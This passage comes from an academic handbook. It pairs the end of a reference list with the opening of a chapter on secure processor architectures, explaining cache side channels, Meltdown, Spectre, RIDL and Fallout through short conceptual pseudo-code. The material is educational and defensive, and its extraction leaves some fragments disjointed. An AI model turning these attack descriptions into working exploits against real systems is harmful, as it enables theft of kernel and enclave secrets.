Cziva R, Anagnostopoulos C, Pezaros DP (2018) Dynamic, latency-optimal VNF placement at the
network edge. In: IEEE infocom 2018-IEEE conference on computer communications. IEEE,
pp 693–701
Dai Y, Xu D, Maharjan S, Zhang Y (2018) Joint offloading and resource allocation in vehicular
edge computing and networks. In: 2018 IEEE global communications conference (GLOBE-
COM). IEEE, pp 1–7
Davis RI, Burns A (2011) A survey of hard real-time scheduling for multiprocessor systems. ACM
Comput Surv (CSUR) 43(4):1–44
Dertouzos M, Mok A (1989) Multiprocessor online scheduling of hard-real-time tasks. IEEE Trans
Softw Eng 15(12):1497–1506. https://doi.org/10.1109/32.58762
Dertouzos ML (1974) Control robotics: the procedural control of physical processes. Inf Process
74:807–813
Dhall SK, Liu CL (1978) On a real-time scheduling problem. Oper Res 26(1):127–140. https://doi.
org/10.1287/opre.26.1.127
Fisher N, Goossens J, Baruah S (2010) Optimal online multiprocessor scheduling of sporadic real-
time tasks is impossible. Real-Time Syst 45:26–71. https://doi.org/10.1007/s11241-010-9092-7
Gao B, Zhou Z, Liu F, Xu F (2019) Winning at the starting line: joint network selection and
service placement for mobile edge computing. In: IEEE INFOCOM 2019-IEEE conference on
computer communications. IEEE, pp 1459–1467
Guo J, Song Z, Cui Y, Liu Z, Ji Y (2017) Energy-efficient resource allocation for multi-user mobile
edge computing. In: GLOBECOM 2017–2017 IEEE global communications conference. IEEE,
pp 1–7
He T, Stankovic J, Lu C, Abdelzaher T (2003) Speed: a stateless protocol for real-time communi-
cation in sensor networks. In: 23rd international conference on distributed computing systems,
2003. Proceedings, pp 46–55. https://doi.org/10.1109/ICDCS.2003.1203451
Heydari J, Ganapathy V, Shah M (2019) Dynamic task offloading in multi-agent mobile edge
computing networks. In: 2019 IEEE global communications conference (GLOBECOM). IEEE,
pp 1–6
IEEE (2016) IEEE standard for low-rate wireless networks. IEEE Std 802154-2015 (Revision of
IEEE Std 802154-2011), pp 1–709. https://doi.org/10.1109/IEEESTD.2016.7460875
4 Real-Time Scheduling for Computing Architectures 167
IEEE (2018) IEEE Standard for Ethernet. IEEE Std 8023-2018 (Revision of IEEE Std 8023-2015).
pp 1–5600. https://doi.org/10.1109/IEEESTD.2018.8457469
Intel (2021) Intel processor graphics gen11 architecture. Intel, Santa Clara
ISO (2018) Iso26262: Road vehicles – functional safety. https://www.iso.org/standard/68383.html.
Accessed: 03 Aug 2023
Jain S, Baek I, Wang S, Rajkumar R (2019) Fractional GPUs: software-based compute and memory
bandwidth reservation for GPUs. In: 2019 IEEE real-time and embedded technology and
applications symposium (RTAS). IEEE, pp 29–41. https://doi.org/10.1109/RTAS.2019.00011
Jiang J, Wang Z, Liu X, Gómez-Luna J, Guan N, Deng Q, Zhang W, Mutlu O (2020) Boyi:
a systematic framework for automatically deciding the right execution model of OpenCL
applications on FPGAs. In: Proceedings of the 2020 ACM/SIGDA international symposium on
field-programmable gate arrays, FPGA’20. Association for Computing Machinery, New York,
pp 299–309. https://doi.org/10.1145/3373087.3375313
Jog A, Kayiran O, Chidambaram Nachiappan N, Mishra AK, Kandemir MT, Mutlu O, Iyer R, Das
CR (2013) Owl: cooperative thread array aware scheduling techniques for improving GPGPU
performance. SIGPLAN Not 48(4):395–406. https://doi.org/10.1145/2499368.2451158
Johnson DB, Maltz DA (1996) Dynamic source routing in ad hoc wireless networks. Springer,
Boston, pp 153–181. https://doi.org/10.1007/978-0-585-29603-6_5
Jošilo S, Dán G (2019) Wireless and computing resource allocation for selfish computation
offloading in edge computing. In: IEEE INFOCOM 2019-IEEE conference on computer
communications. IEEE, pp 2467–2475
Kang W, Lee K, Lee J, Shin I, Chwa HS (2021) Lalarand: flexible layer-by-layer CPU/GPU
scheduling for real-time DNN tasks. In: 2021 IEEE real-time systems symposium (RTSS).
IEEE, pp 329–341. https://doi.org/10.1109/RTSS52674.2021.00038
Kao YH, Krishnamachari B, Ra MR, Bai F (2017) Hermes: latency optimal task assignment for
resource-constrained mobile computing. IEEE Trans Mob Comput 16(11):3056–3069
Kato S, Lakshmanan K, Kumar A, Kelkar M, Ishikawa Y, Rajkumar R (2011a) RGEM: a
responsive GPGPU execution model for runtime engines. In: 2011 IEEE 32nd real-time systems
symposium. IEEE, pp 57–66. https://doi.org/10.1109/RTSS.2011.13
Kato S, Lakshmanan K, Rajkumar R, Ishikawa Y (2011b) TimeGraph: GPU scheduling for real-
time multi-tasking environments. In: 2011 USENIX annual technical conference (USENIX
ATC 11). USENIX Association, Portland. https://www.usenix.org/conference/usenixatc11/
timegraph-gpu-scheduling-real-time-multi-tasking-environments
Kim BS, Park H, Kim KH, Godfrey D, Kim KI (2017) A survey on real-time communications
in wireless sensor networks. Wirel Commun Mob Comput 2017:1–14. https://doi.org/10.1155/
2017/1864847
Kim MK (2021) Efficient link scheduling based on estimated number of packets in queue
on industrial wireless sensor networks. Energies 14(19). https://doi.org/10.3390/en14196370,
https://www.mdpi.com/1996-1073/14/19/6370
Kopetz H, Ademaj A, Grillinger P, Steinhammer K (2005) The time-triggered ethernet (TTE)
design. In: Eighth IEEE international symposium on object-oriented real-time distributed
computing (ISORC’05), pp 22–33. https://doi.org/10.1109/ISORC.2005.56
Leonardi L, Lo Bello L, Patti G (2023) Resemble: a real-time stack for synchronized mesh mobile
bluetooth low energy networks. Appl Syst Innov 6. https://doi.org/10.3390/asi6010019
Leung JYT, Whitehead J (1982) On the complexity of fixed-priority scheduling of periodic,
real-time tasks. Perform Eval 2(4):237–250. http://dblp.uni-trier.de/db/journals/pe/pe2.html#
LeungW82
Levin G, Funk S, Sadowski C, Pye I, Brandt S (2010) Dp-fair: a simple model for understanding
optimal multiprocessor scheduling. In: Euromicro conference on real-time systems. IEEE,
pp 3–13
Lin CC, Shi J, Ueter N, Günzel M, Reineke J, Chen JJ (2022) Type-aware federated scheduling for
typed DAG tasks on heterogeneous multicore platforms. IEEE Trans Comput 72(5):1286–1300.
https://doi.org/10.1109/TC.2022.3202748
168 A. Easwaran et al.
Regnier P, Lima G, Massa E, Levin G, Brandt S (2011) Run: optimal multiprocessor real-
time scheduling via reduction to uniprocessor. In: IEEE real-time systems symposium. IEEE,
pp 104–115
Ren J, Yu G, Cai Y, He Y, Qu F (2017) Partial offloading for latency minimization in mobile-
edge computing. In: GLOBECOM 2017-2017 IEEE global communications conference. IEEE,
pp 1–6
Rossbach CJ, Currey J, Silberstein M, Ray B, Witchel E (2011) Ptask: operating system
abstractions to manage GPUs as compute devices. In: Proceedings of the twenty-third ACM
symposium on operating systems principles, pp 233–248
SAE (2021) Arinc653:avionics application software standard interface. https://www.sae.org/
standards/content/arinc653p0-3/. Accessed: 03 Aug 2023
Safaric S, Malaric K (2006) Zigbee wireless standard. In: Proceedings ELMAR 2006, pp 259–262.
https://doi.org/10.1109/ELMAR.2006.329562
Saifullah A, Xu Y, Lu C, Chen Y (2010) Real-time scheduling for wirelesshart networks. In: 2010
31st IEEE real-time systems symposium, pp 150–159. https://doi.org/10.1109/RTSS.2010.41
Samaddar A, Easwaran A, Tan R (2020) A schedule randomization policy to mitigate timing
attacks in wirelesshart networks. Real-Time Syst 56:452–489
Silberschatz A, Gagne G, Galvin PB (2018) Operating system concepts, 10th edn. Wiley. https://
www.os-book.com/OS10/
Sprunt B, Sha LR, Lehoczky JP (1989) Scheduling sporadic and aperiodic events in a hard real-
time system. Final report. https://resources.sei.cmu.edu/asset_files/TechnicalReport/1989_005_
001_15749.pdf
Sun C, She C, Yang C (2017) Energy-efficient resource allocation for ultra-reliable and low-latency
communications. In: GLOBECOM 2017-2017 IEEE global communications conference. IEEE,
pp 1–6
Takagi H, Kleinrock L (1984) Optimal transmission ranges for randomly distributed packet radio
terminals. IEEE Trans Commun 32(3):246–257. https://doi.org/10.1109/TCOM.1984.1096061
Tan H, Han Z, Li XY, Lau FC (2017) Online job dispatching and scheduling in edge-clouds. In:
IEEE INFOCOM 2017-IEEE conference on computer communications. IEEE, pp 1–9
Tanenbaum AS, Bos H (2022) Modern operating systems, 5th edn. Pearson, Boston
Tindell K, Burns A, Wellings A (2000) Calculating controller area network (CAN) mes-
sage response times. Control Eng Pract 3:1163–1169. https://doi.org/10.1016/0967-0661(95)
00112-8
Tong L, Li Y, Gao W (2016) A hierarchical edge cloud architecture for mobile computing. In: IEEE
INFOCOM 2016-The 35th annual IEEE international conference on computer communications.
IEEE, pp 1–9
Vu TT, Van Huynh N, Hoang DT, Nguyen DN, Dutkiewicz E (2018) Offloading energy efficiency
with delay constraint for cooperative mobile edge computing networks. In: 2018 IEEE global
communications conference (GLOBECOM). IEEE, pp 1–6
Vuduc R, Choi J (2013) A brief history and introduction to GPGPU. Springer, Boston, pp 9–23.
https://doi.org/10.1007/978-1-4614-8745-6_2
Wei YH, Leng Q, Han S, Mok AK, Zhang W, Tomizuka M (2013) Rt-wifi: real-time high-speed
communication protocol for wireless cyber-physical control applications. In: 2013 IEEE 34th
real-time systems symposium, pp 140–149. https://doi.org/10.1109/RTSS.2013.22
WindRiverSystems (1987) Windriver vxworks. https://www.windriver.com/products/vxworks.
Accessed: 03 Aug 2023
Xiao Y, Krunz M (2017) Qoe and power efficiency tradeoff for fog computing networks with fog
node cooperation. In: IEEE INFOCOM 2017-IEEE conference on computer communications.
IEEE, pp 1–9
Xu F, Xu J, Chen J, Chen L, Shang R, Zhou Z, Liu F (2023) igniter: interference-aware GPU
resource provisioning for predictable DNN inference in the cloud. IEEE Trans Parallel Distrib
Syst 34(3):812–827. https://doi.org/10.1109/TPDS.2022.3232715
170 A. Easwaran et al.
Yandrofski T, Chen J, Otterness N, Anderson JH, Smith FD (2022) Making powerful enemies
on NVIDIA GPUs. In: 2022 IEEE real-time systems symposium (RTSS). IEEE, pp 383–395.
https://doi.org/10.1109/RTSS55097.2022.00040
Yao J, Lu Q, Tian R, Li K, Guan H (2023) An economy-oriented GPU virtualization with dynamic
and adaptive oversubscription. IEEE Trans Comput 72(5):1371–1383. https://doi.org/10.1109/
TC.2022.3199998
Yaqub U, Sorour S (2018) Multi-objective resource optimization for hierarchical mobile edge
computing. In: 2018 IEEE global communications conference (GLOBECOM). IEEE, pp 1–6
Yu K, Gidlund M, Åkerbergy J, Björkman M (2013) Low jitter scheduling for industrial wireless
sensor and actuator networks. In: IECON 2013 – 39th annual conference of the IEEE industrial
electronics society, pp 5594–5599. https://doi.org/10.1109/IECON.2013.6700050
Yu R, Xue G, Zhang X (2018) Application provisioning in fog computing-enabled internet-
of-things: a network perspective. In: IEEE INFOCOM 2018-IEEE conference on computer
communications. IEEE, pp 783–791
Zeng D, Gu L, Guo S, Cheng Z, Yu S (2016) Joint optimization of task scheduling and image
placement in fog computing supported software-defined embedded system. IEEE Trans Comput
65(12):3702–3712
Zhang DY, Wang D (2019) An integrated top-down and bottom-up task allocation approach in
social sensing based edge computing systems. In: IEEE INFOCOM 2019-IEEE conference on
computer communications. IEEE, pp 766–774
Zhang L, Geng S (1998) The complexity of the 0/1 multi-knapsack problem. J Comput Sci Technol
1:46–50. https://doi.org/10.1007/BF02943300
Zhao H, Cui W, Chen Q, Guo M (2023) Ispa: exploiting intra-SM parallelism in GPUs via fine-
grained resource management. IEEE Trans Comput 72(5):1473–1487. https://doi.org/10.1109/
TC.2022.3214088
Zheng X, Cai Z, Li J, Gao H (2017) A study on application-aware scheduling in wireless networks.
IEEE Trans Mob Comput 16(7):1787–1801. https://doi.org/10.1109/TMC.2016.2613529
Zou A, Li J, Gill CD, Zhang X (2023) RTGPU: real-time GPU scheduling of hard deadline parallel
tasks with fine-grain utilization. IEEE Trans Parallel Distrib Syst 34(5):1450–1465. https://doi.
org/10.1109/TPDS.2023.3235439
Secure Processor Architectures
5
Nikhilesh Singh, Vinod Ganesan, and Chester Rebeiro
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Modern CPU Microarchitecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Micro-architectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Transient Micro-architectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Meltdown and Spectre-Like Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
Micro-architectural Data Sampling Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Prevention-Based Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Detection-Based Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
Abstract
In the last two decades, the evolving cyber-threat landscape has brought to
center stage the contentious trade-offs between security and performance of
modern microprocessors. The guarantees provided by the hardware to ensure
no violation of process boundaries have been shown to be breached in several
real-world scenarios. While modern CPU features such as superscalar, out-of-
order, simultaneous multi-threading, and speculative execution play a critical role
in boosting system performance, they are central for a potent class of security
attacks termed transient micro-architectural attacks. These attacks leverage
shared hardware resources in the CPU that are used during speculative and out-
of-order execution to steal sensitive information. Researchers have used these
attacks to read data from the operating systems (OS) and trusted execution
environments (TEE) and to even break hardware-enforced isolation.
Over the years, several variants of transient micro-architectural attacks have
been developed. While each variant differs in the shared hardware resource
used, the underlying attack follows a similar strategy. This chapter presents a
panoramic view of security concerns in modern CPUs, focusing on the mech-
anisms of these attacks and providing a classification of the variants. Further,
the authors discuss state-of-the-art defense mechanisms towards mitigating these
attacks.
Keywords
Introduction
For over half a century, microprocessor research has focused on improving per-
formance. Various micro-architectural features such as cache memories, branch
prediction, superscalar, speculative, and out-of-order execution were developed to
facilitate this. While some of these features, for example, the cache memory, were
introduced to hide the latency of slow components, others like branch predictors
helped hide overheads due to operations that slow down program execution.
Features like out-of-order execution and speculative execution were introduced
to better utilize available resources. Side-by-side features were incorporated in
processors to support better multi-programming. Features such as multi-core pro-
cessors and hardware multi-threading were incorporated to allow multiple users
to simultaneously share a processor. These features accelerated new computing
paradigms, especially cloud computing, where multiple users simultaneously share
common hardware, thereby drastically reducing computation costs.
A critical aspect of the cloud computing paradigm is the isolation between
users. To isolate one user’s program from another, security schemes such as pro-
tection rings, segmentation, page table access controls bits, virtualization support,
hardware-based security, crypto-accelerators, and trusted execution environments
were introduced. Very soon, it was realized that these security schemes were
insufficient. The shared hardware became a source of information leaks that
could undermine the isolation provided by the processor. These attacks, popularly
known as micro-architectural attacks, made use of shared hardware resources
to glean sensitive information such as cryptographic keys, web pages visited,
user passwords, and keystrokes. Different strategies such as time-driven attacks,
Prime+Probe, Flush+Reload, and Evict+Time were proposed for this purpose. In a
5 Secure Processor Architectures 173
cloud computing environment, these attacks could leak information from one user
to another, in spite of having all security features enabled.
In 2018, two potent micro-architectural attack variants were proposed, namely,
Meltdown (Lipp et al. 2018) and Spectre (Kocher et al. 2019), that exploited
the speculative and out-of-order execution features present in microprocessors.
These attacks leveraged the fact that a processor’s speculation may not always
be correct. When speculation goes wrong, the speculatively executed instructions,
called transient instructions, need to be discarded, and the CPU should be rolled
back to a previous state. However, this rollback is not always perfect. The CPU
would still have a reminisce of the transient instructions. Researchers showed how
this reminisce can be used to leak secrets. These attacks, which came to be called
transient micro-architectural attacks, could read the contents of any memory region,
including the OS memory. It could also read memory from trusted enclaves, even
though the enclaves used encrypted memory.
Since 2018, there have been several variants of transient micro-architectural
attacks including Zombieload (Schwarz et al. 2019a), Foreshadow (Bulck et al.
2018), Rogue In-Flight Data Load (RIDL) (van Schaik et al. 2019), Fallout (Canella
et al. 2019), Load Value Injection (LVI) (Bulck et al. 2020), and Crosstalk (Ragab
et al. 2021). Each variant found a new vulnerability that could bypass isolation in the
CPU. Many of these attacks are not easily prevented by software patches. For those
that can, the patches have huge performance penalties. It would require fundamental
changes in the CPU design to mitigate these attacks in hardware.
This chapter would provide an introduction to transient micro-architectural
attacks. Starting from Meltdown and Spectre, the authors would dwell on the basic
principle of the attacks. This would be useful in distinguishing between the various
attack classes and discussing the available mitigation techniques. Section “Modern
CPU Microarchitecture” provides a background of modern CPU micro-architecture
and also gives an introduction to micro-architectural attacks. Section “Transient
Micro-architectural Attacks” discusses transient micro-architectural attacks and
classifies them. Section “Countermeasures” discusses the defenses for these attacks,
while the final section has the concluding remarks.
enclave code and data present in the DRAM. Decryption is done when the code
or data is fetched into the processor. Thus, the contents of an enclave, when in
RAM, are always in an encrypted form and not accessible to any code outside
the enclave regardless of the privilege levels. In recent years, however, researchers
have shown that such trusted execution environments are not a panacea against
the threat of transient micro-architectural attacks (Bulck et al. 2018; Weisse et al.
2018). The potency of these attacks is one of the reasons that led to the deprecation
of Intel SGX from upcoming desktop processors (Intel Corporation 2021, 2022),
posing further open questions regarding the security of hardware designs. In this
section, we explore the premise of such attacks on the micro-architecture from first
principles, starting with a background on the working of transient instruction in
superscalar CPUs.
instance, the general purpose registers, can be read or modified using instructions
in the ISA, a significant portion of the structures are hidden and inaccessible from
software. To enforce separation between applications, system software ensures that
the data present in the ISA visible shared memory structures of one application
cannot be read or modified by another application. For example, during a context
switch, general purpose registers are either invalidated or loaded with the context of
176 N. Singh et al.
the next process that executes, thus achieving a temporal separation between the two
processes. In multi-core or multi-threaded CPUs on the other hand, the ISA visible
memory structures are duplicated enforcing spatial separation.
Unlike the visible structures, the hidden memory structures in the CPU, such as
cache memories and branch prediction units, are not always spatially and temporally
separated between applications. They retain their values across context switches and
are possibly shared in multi-core and multi-threaded CPUs. For example, a cache
line that holds data from one application can be evicted by another application.
Similarly, a branch predictor trained on branches in one application can influence
the outcome of a prediction in another application. At first glance, this may seem
innocuous as the structures are hidden from software. However, researchers have
found that one application can indirectly affect another by these shared hidden
memory structures. This has led to a series of security vulnerabilities, commonly
grouped in a category called micro-architectural attacks. The red regions in Fig. 1
are modules in the processor with demonstrated security vulnerabilities. Researchers
have used these vulnerabilities to break cryptographic algorithms, read operating
system data, and break trusted execution environments.
Micro-architectural Attacks
Prime+Probe Attacks. Prime and probe forms for the basis for several micro-
architectural attacks. It exploits the variance in the execution time caused by two
applications that contend for the same shared hardware resource. The attack is
discussed by showing an example of how the cache memory can be used to create
5 Secure Processor Architectures 177
(a)
(b)
(c)
Fig. 2 Prime+Probe, Flush+Reload, and Evict+Time are the most common algorithms used to
exfiltrate data in a micro-architectural attack. This figure demonstrates these algorithms in a covert
channel that uses cache memory to transmit one bit of information from a sender to a receiver. (a)
Prime+Probe. (b) Flush+Reload. (c) Evict+Time
178 N. Singh et al.
message bit, the sender performs a memory operation to evict the receiver’s data
from the corresponding cache set. For example, to transmit a 0, the sender would
evict the receiver’s data from the cache set C0. (3) In the probe phase, the receiver
repeats the memory operations in step (1), but this time also measures the execution
time. Based on the execution time, the receiver can infer the transmitted bit since the
memory access to the evicted cache set would take longer owing to the cache miss.
Prime+probe in micro-architectural attacks work similarly, except for the fact
that the sender and receiver do not collude. Instead, the receiver primes sufficient
number of sets in the cache (step (1)), waits for the sender to execute and evict one
or more cache lines in these sets, and then performs a probe similar to step (3) to
identify patterns in the sender’s execution.
When transient instructions execute, the hidden states of the CPU are modified.
While the results of a transient operation are discarded after the speculation is
proved wrong, the hidden state of the CPU is not rolled back. Thus, transient
instructions have a permanent impact on the CPU state. Consider, for example, the
following code snippet.
Fig. 3 In a transient attack, the transient instruction modifies the hidden states of CPU like cache
memories, FPU, and ports, in a manner that depends on secret information. In the next stage, the
attacker exfiltrates these secrets from the hidden states
classes based on the micro-architectural medium used for the leakage. The first is
address-controllable transient attacks like Meltdown and Spectre, while the others
are based on micro-architectural data sampling from internal buffers. While at a high
level, the stages in both categories are the same and follow Fig. 3, there are subtle
differences between the two classes. Address-dependent attacks like Meltdown
and Spectre use micro-architectural components like cache memories or branch
prediction units as a medium for leakage. In these attacks, data (or instructions)
placed in strategic memory addresses are transiently loaded (or executed). For
example, in the covert channels described in section “Micro-architectural Attacks”,
an address is used to select a cache set. The choice of the cache set is used as a
medium for information leakage. In micro-architectural data sampling attacks like
Zombieload and Crosstalk, on the other hand, it is not the address that is critical.
Instructions are crafted so as to snoop into internal buffers like re-order buffers,
line-fill buffers, and load and store buffers. Table 1 classify the known attacks into
these two categories.
These attacks require the knowledge memory regions of interest, and the attacker
can target them specifically. Attacks like Meltdown (Lipp et al. 2018), Spec-
tre (Kocher et al. 2019), and Foreshadow (Bulck et al. 2018) fall in to this category.
The upcoming sections look into each of these attacks to elaborate on their design
and mechanisms.
Meltdown. CPUs use protection rings to isolate privileged code. For example, Intel
CPUs have four rings: Ring 0 to Ring 3. Privileged code, such as the operating
system’s kernel, is assigned to Ring 0, while user processes are assigned to Ring 3.
The hardware ensures that during regular operations, code executing in Ring 3
cannot read or write to Ring 0, thus isolating the kernel’s code and data from
182 N. Singh et al.
Fig. 4 Transitive execution of a memory load instruction causes data from array to be loaded
into cache memory. Unlike the visible micro-architectural state, the cache contents are not rolled
back when transient instructions are discarded. The contents of the cache can be gleaned using
techniques such as Prime+Probe or Flush+Reload
userspace programs. The Meltdown attack exploits transient execution to read kernel
data from a user program, thus breaching the isolation provided by the protection
rings.
Prior to 2018, the kernel was mapped into the virtual address space of every
process, as shown in Fig. 4. This simplifies system calls and interrupt handling.
Since the kernel was in Ring 0, a user function would not be able to directly access
the kernel. The Meltdown attack showed how a userspace transient memory load or
store operation to a kernel address caused the data to be loaded into the cache mem-
ory. This data could then be gleaned using one of the micro-architectural algorithms
like Prime+Probe or Flush+Reload (section “Micro-architectural Attacks”).
In the first stage of Meltdown, the attacker writes code (Institute of Applied
Information Processing Communications) as shown in Fig. 4 that would perform
a load from a kernel address. Specifically ptr is made to hold a kernel address.
In the ideal case, this should have immediately created an exception because a user
instruction is trying to read kernel data. However, modern CPUs are designed in
a way that delays the exception, allowing subsequent instructions to be transiently
executed. The contents of the kernel space data would thus be loaded into the register
i, which is then used to load an element from the array into y. During this process,
y is also stored in the cache memory. Notice that the array is indexed based on
5 Secure Processor Architectures 183
the kernel data. All of these instructions are transiently executed. At the time of
throwing the exception, the CPU would discard the new values of i and y, but will
not roll back the cache memory.
In the final stage of Meltdown, either the Flush+Reload or the Prime+Probe can
be used to identify the cache set that holds the loaded array data, thus revealing
information about the kernel data. With the Flush+Reload, for instance, the attacker
would first ensure that all array elements are flushed from the cache before the
transient instructions M1 and M2 execute. Post their execution, exactly one element
corresponding to y would be present in the cache. The cache set that holds y can
be inferred by measuring execution time to load each array element. The cache
set containing y would have the shortest load time due to a cache hit. All other
elements, by virtue of the initial flush, would result in cache misses.
Spectre. While the Meltdown attack makes use of an illegal load or store memory
operation to induce a transient execution, Spectre makes use of mispredicted
branches. Modern microprocessors have a Branch Prediction Unit (BPU) that
speculates the direction and the target address of a branch during program execution.
The prediction is done by learning patterns in taken and not-taken branches
from the branch history. For example, consider the following code snippet, where
array1_size is the size of array1 and is used to check the bounds of the index
x. Statements S2 and S3 are executed only if x is within bounds.
S1. if (x < array1_size){
S2. i = array1[x];
S3. y = array2[i * 256];
S4. }
If the snippet is executed repeatedly with legal values of x, the BPU would learn
the execution pattern and speculatively execute statements S2 and S3. The results
in i and y, however, would be committed only after the check x < array1_-
size is completed. After a while of such repeated executions, if x is made illegal
(i.e., x≥ array1_size), the BPU would predict incorrectly leading to transiently
executed S1 and S2. The two transient memory operations would load data into
cache. The misprediction would ignore the new values computed for i and y but
not rollback the cache memory. The final stage of Spectre is similar to Meltdown
and uses micro-architectural attack techniques like Evict+Time and Flush+Reload
to glean information about array1[x] from the cache memory. For example, if
array1[x] corresponds to a kernel region, the attack would reveal the contents
of the kernel location.
Spectre is one of the most powerful of all transient attacks because it is very
difficult to mitigate. Over the years, multiple variants of Spectre have been proposed
that exploit the different components of branch speculation in the processor. The
different variants of Spectre attempt to tune different tables in the BPU. For
example, Kocher et al. (2019) and Schwarz et al. (2019b) exploits the Path History
Table (PHT), while Bhattacharyya et al. (2019), Chen et al. (2020), and Kocher
et al. (2019) exploits the Branch Target Buffer (BTB), and Koruyeh et al. (2018)
and Maisuradze and Rossow (2018) use the Return Stack Buffers (RSB).
184 N. Singh et al.
Rogue In-Flight Data Load (RIDL). In traditional cache memories, a cache miss
would block any further memory requests until the cache miss is serviced. In out-of-
order CPUs, addresses corresponding to cache misses are stored in a line-fill buffer
(LFB), so that subsequent memory requests can be serviced. This helps create a
non-blocking cache. On receiving a memory request that results in a cache miss,
5 Secure Processor Architectures 185
an entry in the LFB is created to store the requested address. Subsequently, when
the memory block is fetched, it is stored in the LFB entry corresponding to the
memory address. The block is also stored in the cache memory and forwarded to
the CPU core. The RIDL attack is able to snoop into the line-fill buffer (LFB) to
retrieve the data from the stored block. Interestingly, the attack does not depend on
the address of the memory request, but only requires a cache miss that makes an
entry in the LFB.
RIDL assumes that the attacker and victim share a common L1 cache memory.
The steps of the attack are shown in Fig. 5. The attacker first ensures that buffer is
flushed from cache and then triggers the victim to execute a load instruction, say at
address A. If this victim’s load results in a miss in the L1 cache, a new entry would
be created in the LFB which would store the physical address of A. The attacker,
running on a different thread in the same core, issues a load to an address present
in a new invalid page. Since this page is new, it would result in a TLB miss and
Fig. 5 In the RIDL attack, the attacker (in green) snoops into the line-fill buffer (LFB) to read the
victim’s sensitive data present in the address (A)
186 N. Singh et al.
trigger a page table walk. The CPU would eventually detect that the load request is
from an invalid page and mark it for exception. The exception is however thrown
much later when the operation’s results are committed in order. During this time, the
memory load operation from buffer[1024 * v] would continue transitively
using an arbitrary value of v picked from an entry in the LFB. The address parts
of the LFB entry are not matched; therefore, with significant probability, the entry
would correspond to the victim’s load request at A, resulting in v holding the value
of the victim’s data d. Thus buffer[1024 * v] is indexed at a location that
is dependent on d. The result is stored in i, as well as in a cache set. After the
exception is thrown due to the illegal address, the transitive results in v and i
are discarded; however, the cache is not rolled back. Flush+Reload is then used
to identify i, thus revealing information about the attacker’s data.
Fallout. Out-of-order processors hide the latency associated with store operations
by using a store buffer. On encountering a store operation, an entry is created in
the buffer to hold the virtual address, physical address, and the value to be stored
in memory. After the entry is created, subsequent operations in the program can
5 Secure Processor Architectures 187
• Condition 1. If the complete address in the load matches the complete address
of an entry in the store buffer, then the value in the entry can be directly used.
• Condition 2. If the virtual to physical address translation for the load fails, and a
few least significant bits match with an entry in the store buffer, then the value in
the entry can be speculatively used.
In their paper Canella et al. (2019), the authors show how both these conditions
can lead to transient attacks. The attacks arise from the fact that store-to-load
forwarding can happen across security domains. It only requires either of the two
conditions to be met. For example, the value in the store buffer entry will be
forwarded just by matching address bits in the store buffer entry and the load
operation. The store could be from the kernel, while the load from a userspace
program.
The second condition leads to an attack called Data Bounce that is used to
identify if a virtual address is valid (i.e., mapped to a physical address). The
pseudo-code is shown in Fig. 6a. This attack can be used to break Address Space
Layout Randomization (ASLR) (PaX; Bhatkar et al. 2003; Xu et al. 2003). The
first condition leads to a vulnerability called Write Transient Forwarding (WTF).
The vulnerability can be used to snoop into stores from another process. Figure 6
provides more details about these attacks.
Speculatively executed.
a Store-to-load forwarding only
occurs if the address ptr is valid.
DB1. <generate an exception> In this case r2 = r1.
DB2. Store ptr, rl
DB3. Load r2, ptr
DB4. <Flush+Reload(r1)> Use Flush+Reload to
exfilterate r1 using the
cache memory.
b
Victim B is an invalid address, but has the same
least significant bits as victim's
Perform a store at address A address A. Store-to-load forwarding
occurs as per Condition 2, if entry for A
is in the store buffer
Attacker
WTF1. Load r1, (B) The transitive value is stored in
WTF2. <Flush+Reload(r1)> register r1 and exfiltrated by
Flush+Reload
Fig. 6 Fallout makes use of store-to-load forwarding of data in the store buffer to a speculatively
executed load operation. The load operation can be from a different security domain, for example,
the kernel. The result of the load is stored in the r1 register and exfilterated using Flush+Reload.
Flush+Reload is similar way to previous attacks. The flush is done before the exception causing
